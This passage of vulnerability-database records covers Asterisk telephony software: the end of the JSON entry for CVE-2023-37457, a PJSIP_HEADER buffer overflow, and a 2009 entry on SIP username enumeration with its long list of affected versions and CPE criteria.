              "matchCriteriaId": "1A716A45-7075-4CA6-9EF5-2DD088248A5C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "80EFA05B-E22D-49CE-BDD6-5C7123F1C12B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "20FD475F-2B46-47C9-B535-1561E29CB7A1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the \u0027update\u0027 functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa."
    },
    {
      "lang": "es",
      "value": "Asterisk es un conjunto de herramientas de telefon\u00eda y centralita privada de c\u00f3digo abierto. En las versiones de Asterisk 18.20.0 y anteriores, 20.5.0 y anteriores y 21.0.0; as\u00ed como ceritifed-asterisk 18.9-cert5 y anteriores, la funcionalidad de \u0027actualizaci\u00f3n\u0027 de la funci\u00f3n de dialplan PJSIP_HEADER puede exceder el espacio de b\u00fafer disponible para almacenar el nuevo valor de un encabezado. Al hacerlo, esto puede sobrescribir la memoria o provocar un bloqueo. Esto no se puede explotar externamente, a menos que el dialplan est\u00e9 escrito expl\u00edcitamente para actualizar un encabezado en funci\u00f3n de datos de una fuente externa. Si no se utiliza la funcionalidad de \u0027actualizaci\u00f3n\u0027, la vulnerabilidad no se produce. Hay un parche disponible en el commit a1ca0268254374b515fa5992f01340f7717113fa."
    }
  ],
  "id": "CVE-2023-37457",
  "lastModified": "2024-11-21T08:11:44.807",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.2,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 4.2,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2023-12-14T20:15:52.260",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-120"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-120"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2009-11-10 18:30

Modified

2024-11-21 01:08

Severity ?

Summary

Asterisk Open Source 1.2.x before 1.2.35, 1.4.x before 1.4.26.3, 1.6.0.x before 1.6.0.17, and 1.6.1.x before 1.6.1.9; Business Edition A.x.x, B.x.x before B.2.5.12, C.2.x.x before C.2.4.5, and C.3.x.x before C.3.2.2; AsteriskNOW 1.5; and s800i 1.3.x before 1.3.0.5 generate different error messages depending on whether a SIP username is valid, which allows remote attackers to enumerate valid usernames via multiple crafted REGISTER messages with inconsistent usernames in the URI in the To header and the Digest in the Authorization header.

References

URL	Tags
secalert@redhat.com	http://downloads.asterisk.org/pub/security/AST-2009-008.html	Vendor Advisory
secalert@redhat.com	http://osvdb.org/59697
secalert@redhat.com	http://secunia.com/advisories/37265	Vendor Advisory
secalert@redhat.com	http://secunia.com/advisories/37479
secalert@redhat.com	http://secunia.com/advisories/37677
secalert@redhat.com	http://www.debian.org/security/2009/dsa-1952
secalert@redhat.com	http://www.securityfocus.com/bid/36924	Patch
secalert@redhat.com	http://www.securitytracker.com/id?1023133
secalert@redhat.com	https://bugzilla.redhat.com/show_bug.cgi?id=523277
secalert@redhat.com	https://bugzilla.redhat.com/show_bug.cgi?id=533137
secalert@redhat.com	https://www.redhat.com/archives/fedora-package-announce/2009-November/msg00789.html
secalert@redhat.com	https://www.redhat.com/archives/fedora-package-announce/2009-November/msg00838.html
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2009-008.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://osvdb.org/59697
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/37265	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/37479
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/37677
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2009/dsa-1952
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/36924	Patch
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id?1023133
af854a3a-2127-422b-91ae-364da2661108	https://bugzilla.redhat.com/show_bug.cgi?id=523277
af854a3a-2127-422b-91ae-364da2661108	https://bugzilla.redhat.com/show_bug.cgi?id=533137
af854a3a-2127-422b-91ae-364da2661108	https://www.redhat.com/archives/fedora-package-announce/2009-November/msg00789.html
af854a3a-2127-422b-91ae-364da2661108	https://www.redhat.com/archives/fedora-package-announce/2009-November/msg00838.html

Impacted products

Vendor	Product	Version
digium	asterisk	1.2.0
digium	asterisk	1.2.0
digium	asterisk	1.2.0
digium	asterisk	1.2.0
digium	asterisk	1.2.0
digium	asterisk	1.2.1
digium	asterisk	1.2.2
digium	asterisk	1.2.2
digium	asterisk	1.2.3
digium	asterisk	1.2.3
digium	asterisk	1.2.10
digium	asterisk	1.2.10
digium	asterisk	1.2.11
digium	asterisk	1.2.11
digium	asterisk	1.2.12
digium	asterisk	1.2.12
digium	asterisk	1.2.12.1
digium	asterisk	1.2.12.1
digium	asterisk	1.2.13
digium	asterisk	1.2.13
digium	asterisk	1.2.14
digium	asterisk	1.2.15
digium	asterisk	1.2.15
digium	asterisk	1.2.16
digium	asterisk	1.2.16
digium	asterisk	1.2.17
digium	asterisk	1.2.17
digium	asterisk	1.2.18
digium	asterisk	1.2.18
digium	asterisk	1.2.19
digium	asterisk	1.2.19
digium	asterisk	1.2.20
digium	asterisk	1.2.20
digium	asterisk	1.2.21
digium	asterisk	1.2.21
digium	asterisk	1.2.21.1
digium	asterisk	1.2.21.1
digium	asterisk	1.2.22
digium	asterisk	1.2.22
digium	asterisk	1.2.23
digium	asterisk	1.2.23
digium	asterisk	1.2.24
digium	asterisk	1.2.24
digium	asterisk	1.2.25
digium	asterisk	1.2.25
digium	asterisk	1.2.26
digium	asterisk	1.2.26
digium	asterisk	1.2.26.1
digium	asterisk	1.2.26.1
digium	asterisk	1.2.26.2
digium	asterisk	1.2.26.2
digium	asterisk	1.2.27
digium	asterisk	1.2.28
digium	asterisk	1.2.28.1
digium	asterisk	1.2.29
digium	asterisk	1.2.30
digium	asterisk	1.2.30.1
digium	asterisk	1.2.30.2
digium	asterisk	1.2.30.3
digium	asterisk	1.2.30.4
digium	asterisk	1.2.31
digium	asterisk	1.2.31.1
digium	asterisk	1.2.32
digium	asterisk	1.2.33
digium	asterisk	1.2.34
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.1
digium	asterisk	1.4.2
digium	asterisk	1.4.3
digium	asterisk	1.4.4
digium	asterisk	1.4.5
digium	asterisk	1.4.6
digium	asterisk	1.4.7
digium	asterisk	1.4.7.1
digium	asterisk	1.4.8
digium	asterisk	1.4.9
digium	asterisk	1.4.10
digium	asterisk	1.4.10.1
digium	asterisk	1.4.11
digium	asterisk	1.4.12
digium	asterisk	1.4.12.1
digium	asterisk	1.4.13
digium	asterisk	1.4.14
digium	asterisk	1.4.15
digium	asterisk	1.4.16
digium	asterisk	1.4.16.1
digium	asterisk	1.4.16.2
digium	asterisk	1.4.17
digium	asterisk	1.4.18
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19.1
digium	asterisk	1.4.19.2
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20.1
digium	asterisk	1.4.21
digium	asterisk	1.4.21
digium	asterisk	1.4.21
digium	asterisk	1.4.21.1
digium	asterisk	1.4.21.2
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22.1
digium	asterisk	1.4.22.2
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23.1
digium	asterisk	1.4.23.2
digium	asterisk	1.4.24
digium	asterisk	1.4.24
digium	asterisk	1.4.24.1
digium	asterisk	1.4.25
digium	asterisk	1.4.25
digium	asterisk	1.4.25.1
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26.1
digium	asterisk	1.4.26.2
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0.1
digium	asterisk	1.6.0.2
digium	asterisk	1.6.0.3
digium	asterisk	1.6.0.3
digium	asterisk	1.6.0.4
digium	asterisk	1.6.0.5
digium	asterisk	1.6.0.6
digium	asterisk	1.6.0.7
digium	asterisk	1.6.0.8
digium	asterisk	1.6.0.9
digium	asterisk	1.6.0.10
digium	asterisk	1.6.0.11
digium	asterisk	1.6.0.11
digium	asterisk	1.6.0.11
digium	asterisk	1.6.0.14
digium	asterisk	1.6.0.14
digium	asterisk	1.6.0.15
digium	asterisk	1.6.0.16
digium	asterisk	1.6.0.16
digium	asterisk	1.6.0.16
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.1
digium	asterisk	1.6.1.2
digium	asterisk	1.6.1.3
digium	asterisk	1.6.1.4
digium	asterisk	1.6.1.5
digium	asterisk	1.6.1.5
digium	asterisk	1.6.1.6
digium	asterisk	1.6.1.7
digium	asterisk	1.6.1.7
digium	asterisk	1.6.1.8
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.10
digium	asterisknow	1.5
digium	s800i	1.3.0
digium	s800i	1.3.0.2
digium	s800i	1.3.0.3
digium	s800i	1.3.0.4
digium	asterisk	a
digium	asterisk	b
digium	asterisk	b.1.3.2
digium	asterisk	b.1.3.3
digium	asterisk	b.2.2.0
digium	asterisk	b.2.2.1
digium	asterisk	b.2.3.1
digium	asterisk	b.2.3.2
digium	asterisk	b.2.3.3
digium	asterisk	b.2.3.4
digium	asterisk	b.2.3.5
digium	asterisk	b.2.3.6
digium	asterisk	b.2.5.0
digium	asterisk	b.2.5.1
digium	asterisk	b.2.5.2
digium	asterisk	b.2.5.3
digium	asterisk	c
digium	asterisk	c.2.3
digium	asterisk	c.3.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "39358795-09A6-44C6-B969-1560CEF40057",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "8C2DAB51-91ED-43D4-AEA9-7C4661089BAE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "A596A018-2FBC-4CEB-9910-756CC6598679",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "14BDCF8E-0B68-430A-A463-EE40C1A9AD65",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "CA2CD93E-71A5-49EC-B986-5868C05553EF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "2B66B213-4397-4435-8E48-8ED69AAE13D3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "55131A3D-C892-44EC-83D6-5888C57B11A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.2:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "E017DD53-B8EC-4EA2-BF59-18C075C5771D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "B940EEC6-4451-42B9-A56D-BDB8801B3685",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.3:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "CE4AB19F-1338-466D-AAD8-584C79FED1AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "175954A5-E712-41B8-BC11-4F999343063D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.10:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "FF5A2AA3-BB1F-4DEA-A369-183877BBDAC9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "1DF9E41E-8FE6-4396-A5D4-D4568600FE03",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.11:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "7B43C508-91E3-49C9-86F0-3643D8F2B7F7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "4457486F-E9B4-46B8-A05D-3B32F8B639A4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.12:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "0831E658-36AB-4A4B-9929-3DB6BE855A3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "69417F54-D92F-46FB-9BFA-995211279C0E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.12.1:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "46A770C7-A7D4-44E3-A8B4-AC2189EAC3DD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "4611BEA0-25EC-4705-A390-6DF678373FF0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.13:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "4BCD1F97-4B56-4DA8-A6EC-FA42A3CB9B97",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "53022458-F443-4402-AC52-FC3AE810E89E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "120B85AA-E9B8-4A4D-81CE-FD36CDB63074",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.15:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "64D94742-7CA1-487B-90E8-5063FBF88925",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "12302460-5D3F-4045-9DBF-606562E03BDF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.16:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "78546FDF-C843-4E48-ABEE-CC3514AA7C3A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "8D6EBC0B-9842-44D1-B9D6-EFB88BE22879",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.17:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "052969F1-6758-46E8-9273-E0F872BD65BE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "624A0F00-4629-4550-847F-F24CC93DFF2B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.18:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "E473F645-F8B0-43FE-957B-F053427465DD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.19:*:*:*:*:*:*:*",
              "matchCriteriaId": "10FC9AAB-1FAD-4953-A2FC-D42E9687D27E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.19:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "460C9907-AA19-402A-85DE-D3CEA98B107B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.20:*:*:*:*:*:*:*",
              "matchCriteriaId": "CD80F0D6-6B5B-41D3-AC41-F1643865088A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.20:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "734D5198-53C1-40D3-B5BF-D74FC71FD3BE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.21:*:*:*:*:*:*:*",
              "matchCriteriaId": "788DEF5E-8A99-463D-89DC-0CC032271554",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.21:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "C0996D7A-9419-4897-A0AF-498AC3A2A81F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.21.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "62D670E6-47E5-4B40-9217-F97D5F39C3EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.21.1:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "94C23DB8-3C92-40FE-B8A6-ADF84D28510E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.22:*:*:*:*:*:*:*",
              "matchCriteriaId": "A6CE7E4E-DA2D-4F03-A226-92965B40AE34",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.22:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "0C59A947-457E-47EB-832E-3DA70CB52695",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.23:*:*:*:*:*:*:*",
              "matchCriteriaId": "55F74B56-B412-4AF1-AED0-C948AB6DC829",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.23:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "3B50ADDB-D3C2-407D-8844-F93866E5F20C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.24:*:*:*:*:*:*:*",
              "matchCriteriaId": "2775A7CC-2D88-4F2D-8C26-1E0DDDD681E9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.24:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "F4149B59-E773-4ED8-A71D-EB7D00808819",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.25:*:*:*:*:*:*:*",
              "matchCriteriaId": "5A0408C3-0FA7-4A17-9451-C4D46CDA8F27",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.25:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "1726090D-0C37-44A4-AD9B-7ED733B8702D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.26:*:*:*:*:*:*:*",
              "matchCriteriaId": "B92B045B-8CD6-4C04-9CCB-DCE9A44F6C12",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.26:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "54354E16-3238-43E8-BAA9-93CA7EB44D4F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.26.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6867EED4-FC3B-4B72-88A5-DED96C729FE6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.26.1:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "1A0867FC-7161-433F-A416-D7207C8D4D36",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.26.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "97BE6B60-3276-4580-843B-743D0D71E3DF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.26.2:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "36491B32-A405-4C5B-938F-9BEA50A8AF16",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.27:*:*:*:*:*:*:*",
              "matchCriteriaId": "6141909B-EBC4-4726-AE9F-669C31257A5C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.28:*:*:*:*:*:*:*",
              "matchCriteriaId": "754A51AC-EF20-4736-ADDB-D2A70BCB79EC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.28.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "4600BB66-6DEB-444B-AF9E-BDD06CFD2876",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.29:*:*:*:*:*:*:*",
              "matchCriteriaId": "EE089E31-3521-4D12-B81C-B6E386AE1409",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.30:*:*:*:*:*:*:*",
              "matchCriteriaId": "FFE86E95-1110-46DF-9A7A-0E1AA56ACE4B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.30.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B6DF5C5-85B4-4595-A69B-1DE70B5E0E41",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.30.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F5E9888-16CD-4DB2-8889-CE4477559C71",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.30.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "C29C9A2C-6435-444E-A20B-5881F3798B85",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.30.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "E77A2569-CFAE-498D-A633-803849CFECE6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.31:*:*:*:*:*:*:*",
              "matchCriteriaId": "D16E88E6-42D0-400E-AF43-111B35CE11E8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.31.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "AE15A42E-030B-48F0-9498-1755DAAEDFB2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.32:*:*:*:*:*:*:*",
              "matchCriteriaId": "39511726-1202-4179-9708-4D3B28496768",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.33:*:*:*:*:*:*:*",
              "matchCriteriaId": "2A9A4328-F274-4591-A386-943FD6608374",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.34:*:*:*:*:*:*:*",
              "matchCriteriaId": "1B4A8C9A-A475-4F02-A6BC-F17CEECBF0AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E56DB29-571D-4615-B347-38CF4590E463",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "FC1188DA-6C27-48D2-9CE7-74D77B24EE9E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "A93B8F91-5C56-44DE-AE29-8468E853759F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "BF7F4D02-7C8E-403C-A53E-A5F8C07F33A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "D85031A3-3444-4650-905D-721F1EBAA24F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F0AC2B3-6E8A-4B26-8A6C-792D9E5072C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2BC8D6D4-A389-4A78-8DA8-351A9CB896E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E979AC4-58EA-4297-9F90-350924BBE440",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "3A58CCD3-4A0C-468B-85F2-59A52B7293A4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "3542DB91-8487-49D6-AA15-E8FD9D6B99D6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "6BA4F3F1-C3F1-4E15-A854-9BB84E33E4AB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "661D710E-79F0-4E98-B35B-ED0549D35C24",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "68291ADE-F9D1-427B-B150-FDA7F2F4788B",
